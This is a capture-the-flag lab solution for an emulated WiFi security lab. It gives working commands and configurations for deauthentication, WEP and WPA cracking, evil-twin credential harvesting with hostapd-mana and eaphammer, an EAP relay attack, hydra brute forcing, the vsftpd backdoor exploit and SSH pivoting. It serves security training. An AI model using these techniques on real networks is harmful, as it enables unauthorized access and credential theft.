Name WiFi Security CTF: [Nov 13-18]

URL https://attackdefense.com/challengedetails?cid=2100

Type Weekly CTF : All

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

WiFi networks have become ubiquitous. The joy of staying connected without wires has pushed
the industry to improve the throughput of WiFi networks to give wired networks tough
competition. Hence, understanding WiFi security and being able to audit a WiFi network is a
critical skill all security professionals should possess.

We have used our emulated WiFi labs to create an environment with different kinds of WiFi
networks and clients. The player will be provided CLI access to a Kali Linux machine with three
monitor mode capable WiFi cards. We have hidden ten flags in the environment.

Flag description

● FLAG1 is BSSID of the home network of a person who works for Aegis Consulting. Hint:
Look for a client with MAC 02:00:00:00:08:00.
● FLAG2 is present on a WiFi access point's HTTP interface
● FLAG3 is the WEP key for a WiFi network operating in the vicinity.
● FLAG4: A WiFi client is looking for a WPA-PSK network. This network's SSID is one of
the most popular 100 SSID. The FLAG4 is the secret passphrase for this network is the
flag?
● Flag 5 is being transmitted in data packets of a very funnily named WPA2-PSK network.
The SSID name is based on a very famous fiction movie series. The secret passphrase
of this network is: FLAG4 | queen | XXX where X is a number from 0-9 and | is the
concatenation symbol.
● FLAG6: A WiFi client is looking for an EAP-PAP network. This network's SSID is one of
the most popular 100 SSID. The FLAG6 is the password saved by the device for this
network is the flag.
 ● Flag 7 is hosted on a webserver of Zora Corporation. However, be aware Zora
Corporation has mandated very strong passwords for WiFi access.
● Flag 8 is hosted on an FTP of ABCorp. The SSID name of ABCorp is CorporateNetwork.
● Flag 9 is hosted on a webserver of ABCorp.
● Flag 10 is stored in a Memcached server of ZenithCorporation. The client trying to
connect to this network has the wrong credential pair. But, the password it is using, is
correct for one of the most common usernames on enterprise WiFi networks.

Objective: Get all 10 Flags!

Solution:

The description of flags is provided in the challenge description. Use that as starting point.

FLAG1 is ​BSSID of the home network of an employee of Aegis Consulting.

Step 1:​ Look around on devices in the vicinity, locate the client probing for “AegisConsulting”
network.

Command:​ airodump-ng wlan0

A client with MAC 02:00:00:00:08:00 is looking for AegisConsulting SSID

Step 2:​ Check the WiFi spectrum to see if this client is connecting to some other network. On
sniffing traffic on channel 44, you will find that this same client is connected to Darthnet SSID.

Command:​ airodump-ng wlan0 -c 44

The BSSID of this network is 68:7F:77:C2:C2:9A

FLAG1: ​68:7F:77:C2:C2:9A

NOTE:​ The AegisConsulting probe is only visible for some time. Once the device connects to
Darthnet, it won’t be visible, after that user will have to Deauth this client. It is deliberately kept
this way.

Launch deauth attack on all BSSIDs one by one.

Deauth Command:​ aireplay-ng -0 100 -a 68:7F:77:C2:C2:9A wlan0

On deauthing the correct BSSID, the AegisConsulting probe request will appear.

In this case, there was no way to know which BSSID to deauth so the user/player is supposed
to use hit and trial on all BSSIDs i.e. deauth all BSSIDs and check if the probe request appears.

 
FLAG2 is present on a WiFi access point's HTTP interface.

There is an multiple open SSIDs in the environment. One of those is “AngelNet”. Connect to it.
Again, as it is a CTF, the player is supposed to look around especially in all open networks to
find the flag.

Step 1:​ Change the state of interface wlan1 to up (i.e. active).

Command:​ ifconfig wlan1 up

Step 2:​ Connect to the network using wlan1 interface

Command:​ iwconfig wlan1 essid AngelNet

Step 3:​ Check the status of the wlan1 interface

Command:​ iw dev

Step 4:​ To get IP layer connectivity, we will need an IP address. Run dhclient to get an IP
address for wlan1.

Command:​ dhclient -v wlan1

Step 5:​ Scan the gateway with nmap.

Command:​ nmap 172.19.0.1

Step 6:​ A webserver is operating on the interface. Check the content being served by it.

Command:​ curl 172.19.0.1

The flag is present in this content.

FLAG2:​ e0878efca2a95a9d4459a29cd22c648f

FLAG3 is the WEP key for a WiFi network operating in the vicinity.

Step 1:​ Look for the WEP networks using airodump-ng.

Command: ​airodump-ng wlan0

Step 2:​ We can observe a WEP network with “ElectricWorks” SSID. It is also transmitting data
packets on channel 6. Run airodump-ng in traffic capture mode on channel 6.

Command:​ airodump-ng wlan0 -c 6 -w wep

Step 2:​ To crack the WEP key, aircrack-ng will need a lot of packets. Open a new tab and use
aireplay-ng to generate packets. We will need the BSSID of WEP network B8:0D:F8:D5:89:F9
and the connected client MAC B2:55:A6:34:3D:23 for this.

Command:​ aireplay-ng -3 -b B8:0D:F8:D5:89:F9 -h B2:55:A6:34:3D:23 wlan0

NOTE:​ It is important that the ARP request count goes up too. For more details, check WEP
cracking theory in PA courses.

Step 3:​ Once we have enough packets (say more than 50,000), stop airodump-ng and
aireplay-ng.
Afterwards, launch aircrack-ng on the .cap file generated by airodump-ng.

Command:​ aircrack-ng wep-01.cap

Step 4:​ Select the index number for our WEP network.

Aircrack will then go ahead and crack the key.

The WEP key of this network is 54123.

FLAG 3: 54123

FLAG4: A WiFi client is looking for a WPA-PSK network. This network's SSID is one of
the 100 most popular SSIDs. FLAG4 is the secret passphrase for this network.

Step 1:​ Create a sample hostapd config file for WPA2-PSK network ans save it as hostapd.conf

Hostapd config
interface=wlan2
ssid=XXXXXX
wpa=1
wpa_passphrase=dummypassword
wpa_key_mgmt=WPA-PSK
rsn_pairwise=TKIP CCMP
channel=6

Step 2: ​Create a bash script named “create_aps.sh” to read the SSIDs from the list and
generate configs

#! /bin/bash
ssid_list="/root/wordlists/100-most-popular-ssid.txt"

while IFS= read -r line

do
echo "Trying : $line"
sed "s/XXXXXX/$line/g" hostapd.conf > hostapd.conf.1
timeout 30 hostapd hostapd.conf.1
done < "$ssid_list"
Step 3:​ Make this script executable and run this script

Commands:
chmod +x create_aps.sh
./create_aps.sh

The script will create APs for each SSID one by one and wait 30 seconds for a client to connect.

Step 4:​ Now one can either use visual inspection of logs or automate the client connection
detection.

Here, by visual inspection we can see that the SSID “Home” got a client connection.
Hence, the SSID is “Home”.

Step 5: ​Create a hostapd configuration file for the WPA-PSK network with SSID “Home” and
name it hostapd.conf. The passphrase can be anything.

Configuration
interface=wlan2
ssid=Home
bssid=b8:0d:f7:83:79:b0
wpa=1
wpa_passphrase=chocolate123
wpa_key_mgmt=WPA-PSK
rsn_pairwise=TKIP CCMP
channel=6

Step 6: ​Run hostapd with this configuration.

Command:​ hostapd -i wlan2 hostapd.conf

Step 7: ​Now we need to wait for the client to connect and to capture the handshake, we will use
airodump-ng on channel 6. Open a new tab and run airodump-ng.

Command:​ airodump-ng -c 6 wlan0 -w cap

The client device will connect to this honeypot and the handshake will be captured.
Check the output in the hostapd tab to confirm that a client tried to connect to honeypot.
Step 8: ​Stop airodump-ng and hostapd. Run aircrack-ng with 100-common-passwords.txt as
wordlist which is present in wordlists/ directory.

Command:​ aircrack-ng -w wordlists/100-common-passwords.txt cap-01.cap

Select the index of ‘Home’ ESSID.

aircrack-ng will start cracking the password.

The WPA-PSK passphrase is friendship.

FLAG 4: friendship

FLAG 5 is being transmitted in data packets of a very funnily named WPA2-PSK network.
The SSID name is based on a very famous fiction movie series.

As per the hint, target Lord-of-the-Pings SSID as that is funny and the name is derived from
Lord of the Rings movie series.

Step 1: ​Run airodump-ng in capture mode on channel 1.

Command:​ airodump-ng -c 1 wlan0 -w packet --essid Lord-of-the-Pings

Step 2: ​The client is already connected to Lord-of-the-Pings SSID. In order to capture the
handshake, launch a deauth attack to disconnect the client. Open a new tab and run
aireplay-ng.

Command:​ aireplay-ng -0 100 -a B8:0D:F7:6E:79:5A wlan0

Now the handshake will be captured by the airodump-ng and will be saved in packet-01.cap file.

Command:​ ls -l

We know that the WPA-PSK passphrase is: FLAG4 | queen | XXX

FLAG4 is friendship, so the known part of passphrase will be: friendshipqueen

Step 3: ​Now to generate all possible passphrases, we will use a python script.

Python script

import itertools
x=000
while x < 1000:
print("friendshipqueen"+str(x))
x = x+1

Step 4: ​Run this python script to generate the wordlist

Command:​ python generate.py > wordlist.txt

Step 5: ​Use this wordlist with aircrack-ng to crack the network

Command:​ aircrack-ng -w wordlist.txt packet-01.cap

The correct WPA-PSK Passphrase: friendshipqueen153

Step 6: ​There are data packets in the capture. Decrypt the traffic for Lord-of-the-Pings network.

Command:​ airdecap-ng -e Lord-of-the-Pings -p friendshipqueen153 packet-01.cap

The decrypted packets will be present in packet-01-dec.cap file

Step 7: ​Check the decrypted packets with tcpdump.

Command:​ tcpdump -r packet-01-dec.cap

Step 8: ​The UDP port rplay unreachable packet seems interesting. Check payloads of the
packets too.

Command:​ tcpdump -nnvvXSs 1514 -r packet-01-dec.cap

The flag is present in the payload.

FLAG 5: 888d2543a15a04805ef26ac062ea127f

FLAG6: A WiFi client is looking for an EAP-PAP network. This network's SSID is one of
the 100 most popular SSIDs. FLAG6 is the password saved by the device for this
network.

Step 1:​ Write the hostapd-mana configuration for the target network and name it hostapd.conf

hostapd-mana Configuration
interface=wlan1
ssid=XXXXXX
channel=6
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1
enable_mana=1

Also, create a hostapd.eap_user file.

EAP user file content

* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP
"1234test" [2]
Step 2: ​Create a bash script named “create_aps.sh” to read the SSIDs from the list and
generate configs

#! /bin/bash
ssid_list="/root/wordlists/100-most-popular-ssid.txt"

while IFS= read -r line

do
echo "Trying : $line"
sed "s/XXXXXX/$line/g" hostapd.conf > hostapd.conf.1
timeout 30 hostapd-mana hostapd.conf.1
done < "$ssid_list"

Step 3:​ Make this script executable and run this script

Commands:
chmod +x create_aps.sh
./create_aps.sh
The script will create APs for each SSID one by one and wait 30 seconds for a client to connect.

Step 4:​ Now one can either use visual inspection of logs or automate the client connection
detection.
Here, by visual inspection, we can see that the EAP-PAP SSID “eduram” got a client
connection. The credentials are also visible

eap-ttls/pap:
username: joshua
password: accessgoliath1

The flag is the password for EAP-PAP network i.e. acccessgoliath1

FLAG 6: accessgoliath1

FLAG 7 is hosted on a webserver of Zora Corporation. However, be aware Zora

Corporation has mandated very strong passwords for WiFi access.

Step 1: ​Check the output of airodump-ng to find out the ENC, CIPHER, and AUTH used by
ZoraCorp.

Command:​ airodump-ng wlan0 -c 11

Step 2: ​Write the hostapd-mana configuration for the target network and name it
hostapd-mana.conf

hostapd-mana Configuration
interface=wlan1
ssid=ZoraCorp
channel=11
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1
enable_mana=1
enable_sycophant=1
sycophant_dir=/tmp/
Also, create a hostapd.eap_user file.

EAP user file content

* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP
"1234test" [2]

Step 3: ​Start the hostapd-mana on wlan0 with the configuration files created above.

Command: ​hostapd-mana hostapd-mana.conf

The next step is to write the configuration for wpa_sycophant. Open a new tab and change
directory to /root/wpa_sycophant/. Afterwards, save the configuration below as
wpa_sycophant_example.conf .

WPA Sycophant Configuration

network={
ssid="ZoraCorp"
# The SSID you would like to relay and authenticate against.
scan_ssid=1
key_mgmt=WPA-EAP
# Do not modify
identity=""
anonymous_identity=""
password=""
# This initialises the variables for me.
# -------------
eap=PEAP
phase1="crypto_binding=0 peaplabel=0"
phase2="auth=MSCHAPV2"
# Dont want to connect back to ourselves,
# so add your rogue BSSID here.
bssid_blacklist=02:00:00:00:01:00
}
Note: ​Please make sure to mention the BSSID of hostapd-mana based honeypot in the
configuration file. This is to make sure that sycophant doesn’t connect to the honeypot.

Step 4: ​Start wpa_sycophant with above configuration on interface wlan2 (while being inside
the wpa_sycopant/ directory)

Command: ​./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan2

The setup is ready. Now, force the client to connect to hostapd-mana honeypot.
Step 5: ​A deauthentication flood can be used to push the client to honeypot. Open a new tab
and run aireplay-ng.

Command:​ aireplay-ng -0 100 -a E2:E9:6A:D4:B3:51 -c A2:EF:A1:A5:80:75 wlan0

Within a few seconds, the client will connect to the honeypot and logs will appear on both the
hostapd-mana and the wpa_sycophant consoles.

The client connects to hostapd-mana honeypot.

Hostapd-mana console logs

Here one can observe the username ‘boris’. Hostapd-mana coordinates with wpa_sycophant to
perform a successful MITM.

WPA Sycophant console logs

From wpa_sycophant’s logs, one can tell that the connection is successful and the interface
wlan2 is connected to the target network.

NOTE: ​It might not work on the first try. Please try 2-3 times before contacting the support.

Step 6: ​The same can be verified by checking the interface status on a new tab. (OR Stop
aireplay-ng and run the commands on that same tab)

Command:​ iw dev

WPA_sycophant script also starts dhclient on the interface. So, check the IP address of the
interface.

Command:​ ifconfig wlan2

The interface now has IP 172.25.0.215 and it looks like the WiFi router is at 172.25.0.1

Step 7: ​Scan the WiFi router with Nmap

Command:​ nmap 172.25.0.1

Step 8: ​SSH, DNS and HTTP servers are running on it.

Check the hosted content on the webserver running on the WiFi router.

Command: ​curl 172.25.0.1

The HTTP content tells that the LAN interface of the router has an IP address 192.228.221.3.
Please note that it will be different each time.
Step 9: ​Run Nmap scan on the next IP of this range (i.e. 192.228.221.4). And, as only the
TCP/UDP traffic is allowed, use Nmap TCP Connect scan.

Command:​ nmap -sT 192.228.221.4

Step 10: ​HTTP server is operating on the machine. Check the content hosted on it.

Command:​ curl 192.228.221.4

Step 11: ​The response came empty. Check header information.

Command:​ curl -I 192.228.221.4

Step 12: ​The webserver content is protected by Basic authentication. Launch hydra to perform
a dictionary attack on it.

Commad:​ hydra -L wordlists/top-usernames.txt -P wordlists/100-common-passwords.txt

192.228.221.4 http-get /
Step 13: ​The hydra has found the credentials. Use these to retrieve the information.

Commands:​ curl -u webmaster:juliana 192.228.221.4

FLAG 7: aede53584e6e524d1cd9c531e3572150

FLAG 8 is hosted on an FTP of ABCorp. The SSID name of ABCorp is CorporateNetwork.

Step 1: ​The CorporateNetwork SSID is operating on channel 6.

Command:​ airodump-ng wlan0 -c 6

Step 2: ​To steal the credentials, let’s start a honeypot.

Command:
cd eaphammer/
./eaphammer -i wlan2 --channel 6 --auth wpa-eap --essid CorporateNetwork --creds
Step 3: ​Launch deauth attack to disconnect the client connected to the target network (i.e.
CorporateNetwork). For this, run aireplay-ng from a separate tab.

Command:​ aireplay-ng -0 100 -a E2:E9:6A:D3:B3:50 -c F2:ED:21:A4:89:A5 wlan0

The client will connect to the honeypot and we will get the username and password hash. Stop
aireplay-ng and eaphammer.

In order to crack the hash, copy the jtr hash line from the output and save it in a new file named
“hash”. (We have changed our directory to /root/ before saving this file.)

Note:​ Using echo to save the hash might put incorrect hash in the file. Use of text editors like
nano and vim is advised.
Step 4: ​Run jtr to crack the hash

Command: ​john --wordlist=wordlists/100-common-passwords.txt hash

We have the password now.

Credentials
Username: molly
Password: trustno1

We also know that it is a PEAP-MSCHAPv2 network. So, create a wpa_supplicant configuration

and name it supplicant.conf

network={
ssid="CorporateNetwork"
scan_ssid=1
key_mgmt=WPA-EAP
eap=PEAP
identity="molly"
password="trustno1"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
Step 5: ​Run wpa_supplicant with this configuration file.

Command:​ wpa_supplicant -B -Dnl80211 -iwlan1 -c supplicant.conf

Step 6: ​Check the status of the interface wlan1

Command:​ iw dev
Step 7: ​Run dhclient to get IP address on the interface.

Command:​ dhclient -v wlan1

Step 8: ​The IP address 172.22.0.181 is assigned to the interface and the gateway is
172.22.0.1. Lets scan the gateway machine.

Command:​ nmap 172.22.0.1

Step 9: ​The gateway is running an HTTP server. Check the content hosted on it.

Command:​ curl 172.22.0.1

Step 10: ​The IP of the router is 192.109.83.3. Scan the next machine in this series
i.e.192.109.83.4.

Command:​ nmap -sT 192.109.83.4

Step 11: ​The target is running an FTP and SSH service. Run service fingerprinting on the
target.

Command:​ nmap -sT -sV 192.109.83.4

The VSFTP version running on target is known to be infected with a backdoor. Connect to it and
provide the username a:) and blank password

Command:​ ftp 192.109.83.4

Username: a:) Password: <blank>

Step 12: ​The control will get stuck after entering the details. The VSFTPD has opened a
listening service on 6200. Open another terminal tab and connect to that with netcat.

Command:​ nc 192.109.83.4 6200

Once connected, check /root for flag.txt

The flag is stored in /root/flag.txt

FLAG 8: 58c7c29a8ab5e7c4c06256b954947f9a

FLAG 9 is hosted on a webserver of ABCorp.

Step 1: ​While interacting the nc session opened for the last flag, check if the compromised
machine has additional network interfaces.
Command:​ ifconfig

Step 2: ​We can observe an additional interface eth1. Try to ping the next IP in that network
range.

Command: ​ping -c 1 192.172.114.3

The ping is successful. So the machine is up. Now to get stable access to the compromised
machine, instead of this netcat based connection, let’s use SSH connection.

Step 3: ​SSH is already running on this machine, check if root login is permitted on this machine.

Command: ​cat /etc/ssh/sshd_config | grep -i root

Step 4: ​The root login is permitted, so we only need to change the root password to be able to
SSH into this machine.

Command: ​passwd root

Set password: welcome

Step 5: ​Close the nc session and SSH into this machine.

Command:​ ssh [email protected]

Username: root Password: welcome

Login was successful.

Step 6: ​Curl and nmap are not present on this machine so copy those from the attacker Kali
machine. Open a new tab for copying the files.

Command:​ scp portable-tools/curl portable-tools/nmap [email protected]:/bin/

Step 7: ​Use nmap from FTP server machine to scan the other machine.

Command: ​nmap 192.172.114.3

Step 8: ​Check the content hosted on HTTP server running on the second target.

Command: ​curl 192.172.114.3

Step 9: ​It is protected by authentication. Check the headers.

Command: ​curl -I 192.172.114.3

Digest authentication is used to protect this directory.

Step 10: ​Transfer the dictionaries from the kali machine to this machine.

Command: ​ scp wordlists/top-usernames.txt wordlists/100-common-passwords.txt

[email protected]:/root/

Step 11: ​On the FTP attacker machine, write a bash script to use curl to carry out a dictionary
attack. vim can be used as the editor.

Step 12: ​Change permissions and run the script.

Command:
chmod +x brute.sh
./brute.sh 192.172.114.3 top-usernames.txt 100-common-passwords.txt

We found the credentials.

Username: admin Password: cookie1

Step 13: ​Use the credentials to access the content.

Command:​ curl -c cookie --digest -u admin:cookie1 192.172.114.3

The flag is hosted on the webpage.

FLAG 9: 11ac49c9cb5a8a763d8990de844da253

FLAG 10 is stored in a memcached server of ZenithCorporation. The client trying to

connect to this network has the wrong credential pair. But, the password it is using is
correct for one of the most common usernames on enterprise WiFi networks.

Step 1: ​A client is looking for ZenithCo. Create a honeypot for SSID ZenithCo using
eaphammer.

Command:
cd eaphammer
./eaphammer -i wlan2 --channel 6 --auth wpa-eap --essid ZenithCo --creds
Wait for the client to connect. The client will connect and we will be able to see the credentials.

Now as per the challenge description, the username is wrong but the password is correct for
one of the popular usernames.

Step 2:​ There are multiple ways to do this

Option 1:​ ​A python/bash script can be used to create configurations with different identity (i.e.
username).

Option 2:​ EAP Spray option of eaphammer can also be used.

On trying different username, the user will notice that “guest” is a the corerct username for this
password.

Take “guest” as the username and create a wpa_supplicant configuration for this network and
name it supplicant.conf

network={
ssid="ZenithCo"
scan_ssid=1
key_mgmt=WPA-EAP
eap=PEAP
identity="guest"
password="mamba123"
phase1="peaplabel=0"
phase2="auth=GTC"
}

Step 3: ​Run the wpa_supplicant with this config.

Command:​ wpa_supplicant -B -Dnl80211 -iwlan1 -c supplicant.conf

Step 4: ​Check the status of the interface in a few seconds.

Command:​ iw dev

Step 5: ​The interface is connected to the network. Get an IP address on the interface by using
dhclient.

Command: ​dhclient -v wlan1

Step 6: ​As before, check the content of the webserver running on the gateway machine.

Command: ​curl 172.30.0.1

The LAN side IP address of the router is 192.23.115.3.

Step 7: ​Scan the next machine on this range i.e. 192.23.115.4

Command:​ nmap -sT 192.23.115.4

Step 8: ​An HTTP server is running on the machine. Check the content.
Command:​ curl 192.23.115.4

Step 9: ​It seems like an API to interact with memcached. Interact with it. List all Memcached
keys.

Command: ​curl 192.23.115.4/list

Step 10: ​Observe that there is an item with the key FLAG10. Retrieve this item.

Command:​ curl 192.23.115.4/get?key=FLAG10

The value of key FLAG10 is the flag.

FLAG 10: 4870fd644137e40694d76d8220bb184b